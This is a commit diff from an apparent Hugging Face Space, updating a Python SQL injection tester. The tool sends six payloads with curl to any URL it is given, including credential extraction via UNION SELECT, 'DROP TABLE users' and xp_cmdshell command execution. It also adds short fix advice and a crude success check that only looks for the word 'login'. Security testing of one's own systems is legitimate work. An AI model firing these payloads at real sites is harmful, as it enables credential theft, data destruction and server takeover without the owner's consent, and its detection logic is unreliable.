Hugging Face's logo

Spaces:
deveshpunjabi
/
CyberSuite-Toolkit
Sleeping

App Files Community
deveshpunjabi commited on
Commit
524f6b0
Β·
verified Β·
1 Parent(s): 18fdeb9

Update sql_injection/sql_injection.py

Browse files
Files changed (1) hide show
  1. sql_injection/sql_injection.py +47 -23
sql_injection/sql_injection.py CHANGED
@@ -1,54 +1,78 @@
1
  import subprocess
2
  import urllib.parse
 
 
3
 
4
  def run_sqlmap(url: str):
5
  """
6
- Test for SQL Injection vulnerabilities with user-friendly results.
7
  Args:
8
  url (str): The URL to test.
9
  Returns:
10
- tuple: Test results as HTML and the path to the results file.
11
  """
12
  try:
13
  url = url.strip()
14
  if not url.startswith(('http://', 'https://')):
15
- return "<h3 style='color: red;'>❌ Invalid URL: Must start with http:// or https://</h3>", None
16
 
17
  payloads = [
18
  ("' OR '1'='1 --", "Bypass login with always-true condition."),
19
- ("' UNION SELECT null, username, password FROM users --", "Extract usernames and passwords."),
20
- ("'; DROP TABLE users; --", "Delete a users table (destructive)."),
21
- ("' OR 'a'='a", "Simple OR condition."),
22
- ("'; EXEC xp_cmdshell('dir') --", "Execute server-side commands (if enabled)."),
23
- ("' AND 1=0 UNION ALL SELECT NULL, version(), current_user --", "Reveal database version and user.")
24
  ]
25
 
26
- results_html = "<h2>SQL Injection Test Results</h2>"
27
- for payload, description in payloads:
 
28
  encoded_payload = urllib.parse.quote(payload)
29
  full_url = f"{url}?id={encoded_payload}"
30
  command = ['curl', '-X', 'GET', full_url]
31
-
32
  result = subprocess.run(command, capture_output=True, text=True)
33
- status_icon = "βœ…" if result.returncode == 0 else "❌"
34
 
35
- results_html += f"""
36
- <div style='border: 1px solid #ccc; padding: 10px; margin: 10px 0;'>
37
- <h3>{status_icon} Payload: {payload}</h3>
38
- <p><strong>Purpose:</strong> {description}</p>
39
- <pre>{result.stdout if result.returncode == 0 else result.stderr}</pre>
40
- </div>
41
- """
 
 
42
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
43
  output_file = "./sql_injection_result.html"
44
  with open(output_file, "w") as file:
45
- file.write(results_html)
46
 
47
- return results_html, output_file
48
 
49
  except Exception as e:
50
- error_message = f"<h3 style='color: red;'>❌ Error running SQL Injection test: {str(e)}</h3>"
51
- error_file = "./sql_injection_error.html"
52
  with open(error_file, "w") as file:
53
  file.write(error_message)
54
  return error_message, error_file
 
1
  import subprocess
2
  import urllib.parse
3
+ import os
4
+
5
 
6
  def run_sqlmap(url: str):
7
  """
8
+ Test for SQL Injection vulnerabilities and provide explanations.
9
  Args:
10
  url (str): The URL to test.
11
  Returns:
12
+ tuple: Test results as a string and the path to the results file.
13
  """
14
  try:
15
  url = url.strip()
16
  if not url.startswith(('http://', 'https://')):
17
+ return "Invalid URL: Must start with http:// or https://", None
18
 
19
  payloads = [
20
  ("' OR '1'='1 --", "Bypass login with always-true condition."),
21
+ ("' UNION SELECT null, username, password FROM users --", "Extract user credentials via UNION SELECT."),
22
+ ("'; DROP TABLE users; --", "Attempt to delete the users table."),
23
+ ("' OR 'a'='a", "Bypass login with simple true condition."),
24
+ ("'; EXEC xp_cmdshell('dir') --", "Execute system command on the server."),
25
+ ("' AND 1=0 UNION ALL SELECT NULL, version(), current_user --", "Retrieve DB version and current user."),
26
  ]
27
 
28
+ results = ""
29
+
30
+ for payload, purpose in payloads:
31
  encoded_payload = urllib.parse.quote(payload)
32
  full_url = f"{url}?id={encoded_payload}"
33
  command = ['curl', '-X', 'GET', full_url]
34
+
35
  result = subprocess.run(command, capture_output=True, text=True)
 
36
 
37
+ success = "βœ…" if result.returncode == 0 and "login" not in result.stdout.lower() else "❌"
38
+
39
+ results += f"{success} Payload: {payload}\n"
40
+ results += f"Purpose: {purpose}\n"
41
+
42
+ if success == "βœ…":
43
+ results += "Result: Potential vulnerability detected!\n"
44
+ else:
45
+ results += "Result: No vulnerability detected for this payload.\n"
46
 
47
+ results += "\nResponse Preview:\n" + result.stdout[:200] + "...\n\n"
48
+
49
+ # Explain the issue and potential fixes
50
+ if success == "βœ…":
51
+ results += "Explanation: The server responded positively to the payload, suggesting a possible vulnerability.\n"
52
+ if "1'='1" in payload:
53
+ results += "Issue: SQL injection allows login bypass.\n"
54
+ results += "Fix: Use prepared statements or ORM libraries to prevent SQL injection. Validate and sanitize user inputs.\n"
55
+ elif "DROP TABLE" in payload:
56
+ results += "Issue: SQL injection can delete critical tables.\n"
57
+ results += "Fix: Apply strict database permissions and input filtering.\n"
58
+ elif "xp_cmdshell" in payload:
59
+ results += "Issue: Remote code execution.\n"
60
+ results += "Fix: Disable dangerous SQL functions and limit server privileges.\n"
61
+ else:
62
+ results += "Issue: Data leakage or server exploitation.\n"
63
+ results += "Fix: Use Web Application Firewalls (WAFs) and keep software up to date.\n"
64
+ results += "\n"
65
+
66
+ # Save results to a file
67
  output_file = "./sql_injection_result.html"
68
  with open(output_file, "w") as file:
69
+ file.write(f"<html><body><pre>{results}</pre></body></html>")
70
 
71
+ return results, output_file
72
 
73
  except Exception as e:
74
+ error_message = f"Error running SQL Injection test: {str(e)}"
75
+ error_file = "./sql_injection_error.txt"
76
  with open(error_file, "w") as file:
77
  file.write(error_message)
78
  return error_message, error_file